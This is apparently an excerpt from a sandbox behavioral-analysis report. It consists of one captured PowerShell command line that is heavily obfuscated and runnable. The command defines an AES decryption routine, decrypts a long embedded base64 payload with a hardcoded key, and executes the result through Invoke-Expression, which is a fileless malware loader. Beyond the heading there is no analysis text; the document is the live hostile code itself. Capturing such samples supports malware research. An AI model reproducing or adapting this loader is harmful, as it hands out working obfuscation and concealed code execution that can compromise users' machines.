Behavioral Analysis

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI74115460793005066150640528154512CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIBcX2z+yHYAurR9wRGdEmBY9gsygsD0wTcVMNnCvyMXvCZBGstofcO0eLggg32bHakmmBeW+K0d/A4YAX0bX88QIRxfQgm0EqVio4414VVwainu+n1+Bk+RaJJKy+K5k9U25ih5rA6wT02wXRfDwNkF4oQA45ofWYOwuBphAHWfgBOJcnpBApew6eZIq1zt397t5QPlT4CXwWQlI/Y0Csvi8NcwPlt0ifD9dQxksA28kB7E/S421zDvplpb09h9jAg4ghwVScNWBh/jdbBW+8wuVddIdyJRScewA3UwklHJDY4x1jG0SiJ4IZXyBOgFpTWwbr0oWU8zDEYxzB95FZkaJeVZKR6tR69E3EL45VR/Q8S51xEJDrBJw/f1Ca15OdM8UoyxKmNku8Z2SBY93+f0yWTVuGDf/qt87W3ijvvtpBaQOY44D9Hf4HNnDcakBMZV+fwTdCZTvO9JnQYehsNPXdA6YR4sQUcHzPyTMxMUHIi44H2cYyrrNvz3aRcuEHnblhVXPC555IkF15dyYcoH+Krj7cG9q9sWqY/9RWCBbQ2MnTVpHyJy07HQuR9R9sjkOca/b7VF//luMcN0PjxzjZCfBBX49oApusoJYReURH+XIwH9++Qz0GpYE1BEpMd3VfuB59LNnx9q4+wtNKH4q2JAZwhPe1Mhb+CBlknuCj7W+RvMx6mFxozEusXpndJbp/Er8vkcq4V7ypObE9pOzb33qMgO4VftaXRAV40dSu0ZTn+6uX0ZoF8v5JgjdPDSZIOYOxoBeKO4mD2sM8EtefpbV7enHS/ChxecbW2XrPZbwFBTnjQOPzEBn3ks1pE2AI28+axe18oJ+AX56MItkZr+IyqcE929LmUK9r/EqOhdS2m3rHpkuAe0GahHIvodoBWrHqaqtjNjMlXAidWa/9OBfyftWMn+PEccpNd3GA+IX1kIUOYa5dk2+0fI3z8fd2xs+jy0XkIXQ+G/4h3LgxBb3WuNSXPkoIUeh5anvW9eIIV5QwIhB+rGLha2K+aRSd3CSqkA4mN8TlU+jwCmfxlTiBEMQSFsVqAygYtAnOGZ1mzkx2j+62RaaN7Kr6yNeeXWC9zhBL+dNi5EPZ8qndYnP1WQktNPDTJh+yjVPPg8t8Yepwz3DvcMSgwt2R0yopM2rIj+HOkTL82zyNEb/gVPbGTlOskyHjFjkimaDhnTw2V80ufsR32F8lsFTIWuHj7cfChaEB5aNg2HvYRGgiJwLhdooMLGFbQoVu20UdllJ+M6UJYgGxFnj7MYby900fHx84gjQaxsdPvDImbYJNHcrM2Qjd7FsiRCEBDWzZ6w1Ys/7eYf5yUKGhskls+AdwWgucYveot7t8xgn8xnyiyeFooboOEsd6E0kDLt0ggdgt80oq4ynf9nPUEeomAIXu6WY4z1/cVNC8+nQZs057RJ/LLXZhf3niT6+WjzDshkQ/moYrt8QQcQlOGzHWrAonMlPqVWtBb0VsPMpOEFd8ZjlO/QpsnO1oyJb2ISr24NQQb56IO4iu3ZCKJ5CeUH84R7V60Cd0cYEaTbLMSIamUJ2Tw4U0+5ul2N/44yOmxpWWo/VFS4Ez5M1nuHsGxN0AWM+s1vtxF2FUfjmFizdRSHEXxGjYV0wk7p+PQLIAR1SPi2VEnUiePgvGsb/Gz1p3ivlpZoHsloVGcgkYllOGZGZDfWx6IxqrcXQn+Ki6+m93tumKbXE0Jq/AGO888uiRcaIHwLXjzltoOzlnl18ZKmrgy/A1G5AmmoCPOXkv3rozXHambXLIQlJcJ4lcCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')